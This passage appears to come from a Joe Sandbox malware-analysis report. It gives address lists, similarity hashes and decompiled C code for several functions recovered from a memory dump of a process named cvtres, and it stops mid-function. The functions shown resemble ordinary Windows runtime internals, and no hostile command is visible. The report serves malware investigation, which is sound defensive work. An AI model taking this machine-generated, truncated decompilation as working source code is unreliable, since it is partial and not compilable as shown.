                                                                        0x0560447c
                                                                        0x05604483
                                                                        0x05604492
                                                                        0x055aaa52
                                                                        0x055aaa54
                                                                        0x055aaa5e
                                                                        0x056044a8
                                                                        0x056044ad
                                                                        0x056044af
                                                                        0x056044b6
                                                                        0x056044b6
                                                                        0x056044b9
                                                                        0x056044bc
                                                                        0x056044cd
                                                                        0x056044d3
                                                                        0x056044d6
                                                                        0x056044e1
                                                                        0x056044e1
                                                                        0x056044e6
                                                                        0x056044e8
                                                                        0x056044fb
                                                                        0x056044fb
                                                                        0x056044e8
                                                                        0x00000000
                                                                        0x055aaa5e
                                                                        0x05604476
                                                                        0x055aaa42
                                                                        0x055aaa46
                                                                        0x055aaa48
                                                                        0x055aaa4c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eedbc972c436271010b96f56d915286efc113cc0f02c80194561d35b0cda84b5
                                                                        • Instruction ID: e4635f7489affe87f0dfd0b6f1a8fb90e8c1d841dfcd272baae5e3a6abce42fb
                                                                        • Opcode Fuzzy Hash: eedbc972c436271010b96f56d915286efc113cc0f02c80194561d35b0cda84b5
                                                                        • Instruction Fuzzy Hash: 0131A272A0021AABCF25AFA4C945A7FB7B9FF44700B014469F901E7644EB749D11DBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E8EC7 Relevance: .1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E055E8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x569d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E055D4E70(0x56986e4, 0x55e9490, 0, 0);
					if( *0x56953e8 > 5 && E055E8F33(0x56953e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x56953e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x56953e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x558bc46;
						_t48 = E05627B9C(0x56953e8, 0x558bc46, _t67, 0x56953e8, _t70,  &_v140);
					}
				}
				return E055EB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                        0x055e8ec7
                                                                        0x055e8ed9
                                                                        0x055e8edc
                                                                        0x055e8ee6
                                                                        0x055e8ee9
                                                                        0x055e8eee
                                                                        0x055e8efc
                                                                        0x055e8f08
                                                                        0x05621349
                                                                        0x05621353
                                                                        0x0562135d
                                                                        0x05621366
                                                                        0x0562136f
                                                                        0x05621375
                                                                        0x0562137c
                                                                        0x05621385
                                                                        0x05621390
                                                                        0x05621391
                                                                        0x0562139c
                                                                        0x0562139d
                                                                        0x056213a6
                                                                        0x056213ac
                                                                        0x056213b2
                                                                        0x056213b5
                                                                        0x056213bc
                                                                        0x056213bf
                                                                        0x056213c2
                                                                        0x056213c5
                                                                        0x056213c8
                                                                        0x056213cb
                                                                        0x056213ce
                                                                        0x056213d1
                                                                        0x056213d4
                                                                        0x056213d7
                                                                        0x056213da
                                                                        0x056213dd
                                                                        0x056213e0
                                                                        0x056213e3
                                                                        0x056213e6
                                                                        0x056213e9
                                                                        0x056213f6
                                                                        0x05621400
                                                                        0x05621400
                                                                        0x055e8f08
                                                                        0x055e8f32

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 258c18d0f178f3a61ed06c0db0b953d8f96e1688592041c6e2428933569d40d2
                                                                        • Instruction ID: e4cc6bf9878d80048ddf5b5e3fff47232c606b62dc185a3287027a0af2b136e9
                                                                        • Opcode Fuzzy Hash: 258c18d0f178f3a61ed06c0db0b953d8f96e1688592041c6e2428933569d40d2
                                                                        • Instruction Fuzzy Hash: 8741AFB1D002189FDB24CFAAD981AADFBF8FB48710F5041AEE519A7201EB705A84CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E4A2C Relevance: .1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 58%
                                                                        			E055E4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x569d360 ^ _t62;
				_v8 =  *0x569d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E055C2280(_t26, 0x5698608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E055BFFB0(_t41, _t51, 0x5698608);
						L2:
						 *0x569b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E055EB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E055C2280(_t28, 0x5698608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E055BFFB0(_t42, _t53, 0x5698608);
							if(_t53 != 0) {
								L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E055BFFB0(_t41, _t51, 0x5698608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                        0x055e4a2c
                                                                        0x055e4a34
                                                                        0x055e4a3c
                                                                        0x055e4a3e
                                                                        0x055e4a48
                                                                        0x055e4a4b
                                                                        0x055e4a4d
                                                                        0x055e4a51
                                                                        0x055e4a9c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055e4aa3
                                                                        0x055e4aa8
                                                                        0x055e4aad
                                                                        0x055e4ab1
                                                                        0x055e4ade
                                                                        0x055e4ae3
                                                                        0x055e4a5a
                                                                        0x055e4a62
                                                                        0x055e4a6a
                                                                        0x055e4a6e
                                                                        0x0561f203
                                                                        0x055e4a84
                                                                        0x055e4a88
                                                                        0x055e4a89
                                                                        0x055e4a8a
                                                                        0x055e4a95
                                                                        0x055e4a95
                                                                        0x055e4a79
                                                                        0x055e4a80
                                                                        0x055e4af2
                                                                        0x055e4af4
                                                                        0x055e4af9
                                                                        0x055e4aff
                                                                        0x055e4b01
                                                                        0x055e4b03
                                                                        0x055e4b08
                                                                        0x0561f20a
                                                                        0x0561f212
                                                                        0x0561f216
                                                                        0x0561f216
                                                                        0x055e4b08
                                                                        0x055e4b13
                                                                        0x055e4b1a
                                                                        0x0561f229
                                                                        0x0561f229
                                                                        0x055e4b1a
                                                                        0x055e4a82
                                                                        0x00000000
                                                                        0x055e4a82
                                                                        0x055e4ab7
                                                                        0x055e4acd
                                                                        0x055e4acd
                                                                        0x055e4ad5
                                                                        0x055e4ada
                                                                        0x00000000
                                                                        0x055e4ada
                                                                        0x055e4ac2
                                                                        0x055e4acb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055e4acb
                                                                        0x055e4a53
                                                                        0x055e4a53
                                                                        0x055e4a58
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cd4b33a68ca62063568bcb4d0618f36fd531953c1065a2205be46f7dd652966e
                                                                        • Instruction ID: eae38ea940fdc5586179361e2bb4659c3cd5f3a22b52ddcdb3cfb5eecdba87dc
                                                                        • Opcode Fuzzy Hash: cd4b33a68ca62063568bcb4d0618f36fd531953c1065a2205be46f7dd652966e
                                                                        • Instruction Fuzzy Hash: 6B31E432205291DBCF25DF55C98AB3AFBAAFFC5720F054569E8564BA40CBB0D840CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055DE730 Relevance: .1, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 74%
                                                                        			E055DE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E055E9670() < 0) {
					L055FDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x5697b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L055C4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M055DE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                        0x055de730
                                                                        0x055de736
                                                                        0x055de738
                                                                        0x055de73d
                                                                        0x055de73e
                                                                        0x055de740
                                                                        0x055de749
                                                                        0x055de765
                                                                        0x055de76a
                                                                        0x055de76b
                                                                        0x055de76c
                                                                        0x055de76d
                                                                        0x055de76e
                                                                        0x055de76f
                                                                        0x055de775
                                                                        0x055de777
                                                                        0x055de77e
                                                                        0x0561b675
                                                                        0x055de784
                                                                        0x055de784
                                                                        0x055de789
                                                                        0x055de7a8
                                                                        0x055de7ac
                                                                        0x055de807
                                                                        0x055de7ae
                                                                        0x055de7ae
                                                                        0x055de7b1
                                                                        0x055de7b4
                                                                        0x055de7b9
                                                                        0x055de7c0
                                                                        0x055de7c4
                                                                        0x055de7ca
                                                                        0x055de7cc
                                                                        0x00000000
                                                                        0x055de7d3
                                                                        0x055de7d6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055de7ff
                                                                        0x055de802
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055de7f9
                                                                        0x055de7fc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055de7f3
                                                                        0x055de7f6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055de7ed
                                                                        0x055de7f0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055de7e7
                                                                        0x055de7ea
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0561b685
                                                                        0x0561b688
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0561b682
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055de7cc
                                                                        0x055de7d9
                                                                        0x055de7dc
                                                                        0x055de7de
                                                                        0x055de7de
                                                                        0x055de7ac
                                                                        0x055de7e4
                                                                        0x055de74b
                                                                        0x055de751
                                                                        0x055de759
                                                                        0x055de761
                                                                        0x055de761

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: aff6a62b5157612f5fa207047f49de13d20af7f022453c1176e660a62a69a000
                                                                        • Instruction ID: 024479916b14a27acb8bf6e9b4a2647572c46abc5b8a64089ce47d3ace765927
                                                                        • Opcode Fuzzy Hash: aff6a62b5157612f5fa207047f49de13d20af7f022453c1176e660a62a69a000
                                                                        • Instruction Fuzzy Hash: D4316D76A14249EFD794CF58D845F9AFBE8FB09314F14865AF908CB341D671E980CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055DBC2C Relevance: .1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E055DBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x5696100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E055C2280(0xd, 0x1b0ef1a0);
				_t41 =  *0x56960f8; // 0x0
				if(_t41 != 0) {
					 *0x56960f8 =  *_t41;
					 *0x56960fc =  *0x56960fc + 0xffff;
				}
				E055BFFB0(_t41, 0x800, 0x1b0ef1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x56960f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L055C4620(0x5696100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x5696100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                        0x055dbc36
                                                                        0x055dbc42
                                                                        0x055dbc45
                                                                        0x055dbc4a
                                                                        0x055dbd35
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055dbc50
                                                                        0x055dbc50
                                                                        0x055dbc58
                                                                        0x055dbc5a
                                                                        0x055dbc60
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0561a4f2
                                                                        0x0561a4f6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0561a4fc
                                                                        0x055dbc79
                                                                        0x055dbc7e
                                                                        0x055dbc86
                                                                        0x055dbd16
                                                                        0x055dbd20
                                                                        0x055dbd20
                                                                        0x055dbc8d
                                                                        0x055dbc94
                                                                        0x055dbcbd
                                                                        0x055dbcca
                                                                        0x055dbccb
                                                                        0x055dbccc
                                                                        0x055dbccd
                                                                        0x055dbcce
                                                                        0x055dbcd4
                                                                        0x055dbcea
                                                                        0x055dbcee
                                                                        0x055dbcf2
                                                                        0x055dbd00
                                                                        0x055dbd04
                                                                        0x00000000
                                                                        0x055dbc96
                                                                        0x055dbcab
                                                                        0x055dbcaf
                                                                        0x055dbd2c
                                                                        0x055dbd2c
                                                                        0x055dbd09
                                                                        0x00000000
                                                                        0x055dbd09
                                                                        0x055dbcb1
                                                                        0x055dbcb5
                                                                        0x055dbcbb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055dbcbb

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4d5820405d25231e0ccd4347ada3904629eb1b8be69f9ce2d73ae5e1d21c1abe
                                                                        • Instruction ID: 05756399e5baf0051fd2ea161fd11b84929380d8c701b4c616fa12ea518e27f7
                                                                        • Opcode Fuzzy Hash: 4d5820405d25231e0ccd4347ada3904629eb1b8be69f9ce2d73ae5e1d21c1abe
                                                                        • Instruction Fuzzy Hash: DD31F13661061A9BCB21EF9CC4C17A6B7BAFB08321F060079EC45DB201EA78D945CBE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D1DB5 Relevance: .1, Instructions: 87COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 60%
                                                                        			E055D1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E055CF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L055C4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E055CF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                        0x055d1dc2
                                                                        0x055d1dc5
                                                                        0x055d1dc7
                                                                        0x055d1dcc
                                                                        0x055d1dce
                                                                        0x055d1dd6
                                                                        0x055d1ddf
                                                                        0x055d1de0
                                                                        0x055d1de1
                                                                        0x055d1de5
                                                                        0x055d1de8
                                                                        0x055d1def
                                                                        0x055d1df0
                                                                        0x055d1df6
                                                                        0x055d1df7
                                                                        0x055d1dfe
                                                                        0x055d1e1a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d1e0b
                                                                        0x055d1e12
                                                                        0x055d1e12
                                                                        0x055d1e00
                                                                        0x055d1e00
                                                                        0x055d1e05
                                                                        0x055d1e1e
                                                                        0x055d1e23
                                                                        0x0561570f
                                                                        0x05615713
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05615719
                                                                        0x05615719
                                                                        0x055d1e2c
                                                                        0x055d1e2d
                                                                        0x055d1e2e
                                                                        0x055d1e2f
                                                                        0x055d1e31
                                                                        0x055d1e32
                                                                        0x055d1e35
                                                                        0x055d1e3d
                                                                        0x05615723
                                                                        0x0561573d
                                                                        0x0561573d
                                                                        0x00000000
                                                                        0x05615723
                                                                        0x055d1e49
                                                                        0x055d1e4e
                                                                        0x055d1e4e
                                                                        0x055d1e09
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                        • Instruction ID: 7498bdd0f8c9661225d6e25861139b41b60ec7941814351d5a0c2ddfc9288251
                                                                        • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                        • Instruction Fuzzy Hash: 9D217C72600519EFD721CFADCC84EAAFFBAFF85640F154099E9069B210D634AE41CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055A9100 Relevance: .1, Instructions: 87COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 76%
                                                                        			E055A9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x567f6e8);
				E055FD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E056788F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E055FD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x56986c0; // 0x50707b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x56986b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E055C2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E056788F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E055EAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x569b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x56984c0;
										if(_t69 >=  *0x56984c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E05679063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E055A922A(_t82);
							_t53 = E055C7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E05678B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
